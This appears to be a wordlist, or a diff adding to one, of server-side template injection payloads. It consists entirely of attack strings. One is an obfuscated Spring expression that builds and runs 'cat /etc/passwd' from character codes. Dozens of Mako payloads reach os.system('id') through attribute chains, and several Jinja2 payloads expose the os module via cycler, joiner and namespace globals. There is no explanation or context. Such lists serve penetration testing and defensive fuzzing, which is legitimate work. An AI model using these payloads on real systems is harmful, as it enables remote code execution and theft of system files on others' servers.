+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")}
+${self.module.runtime.util.os.system("id")}
+${self.template.module.cache.util.os.system("id")}
+${self.module.cache.compat.inspect.os.system("id")}
+${self.__init__.__globals__['util'].os.system('id')}
+${self.template.module.runtime.util.os.system("id")}
+${self.module.filters.compat.inspect.os.system("id")}
+${self.module.runtime.compat.inspect.os.system("id")}
+${self.module.runtime.exceptions.util.os.system("id")}
+${self.template.__init__.__globals__['os'].system('id')}
+${self.module.cache.util.compat.inspect.os.system("id")}
+${self.module.runtime.util.compat.inspect.os.system("id")}
+${self.template._mmarker.module.cache.util.os.system("id")}
+${self.template.module.cache.compat.inspect.os.system("id")}
+${self.module.cache.compat.inspect.linecache.os.system("id")}
+${self.template._mmarker.module.runtime.util.os.system("id")}
+${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
+${self.template.module.filters.compat.inspect.os.system("id")}
+${self.template.module.runtime.compat.inspect.os.system("id")}
+${self.module.filters.compat.inspect.linecache.os.system("id")}
+${self.module.runtime.compat.inspect.linecache.os.system("id")}
+${self.template.module.runtime.exceptions.util.os.system("id")}
+${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
+${self.context._with_template.module.cache.util.os.system("id")}
+${self.module.runtime.exceptions.compat.inspect.os.system("id")}
+${self.template.module.cache.util.compat.inspect.os.system("id")}
+${self.context._with_template.module.runtime.util.os.system("id")}
+${self.module.cache.util.compat.inspect.linecache.os.system("id")}
+${self.template.module.runtime.util.compat.inspect.os.system("id")}
+${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
+${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
+${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
+${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
+${self.template.module.cache.compat.inspect.linecache.os.system("id")}
+${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
+${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
+${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
+${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
+${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
+${self.template.module.filters.compat.inspect.linecache.os.system("id")}
+${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
+${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
+${self.context._with_template._mmarker.module.cache.util.os.system("id")}
+${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
+${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
+${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
+${self.context._with_template.module.cache.compat.inspect.os.system("id")}
+${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
+${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
+${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
+${self.context._with_template.module.filters.compat.inspect.os.system("id")}
+${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
+${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
+${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
+{{self._TemplateReference__context.cycler.__init__.__globals__.os}}
+{{self._TemplateReference__context.joiner.__init__.__globals__.os}}
+{{self._TemplateReference__context.namespace.__init__.__globals__.os}}
+{{cycler.__init__.__globals__.os}}
+{{joiner.__init__.__globals__.os}}
+{{namespace.__init__.__globals__.os}}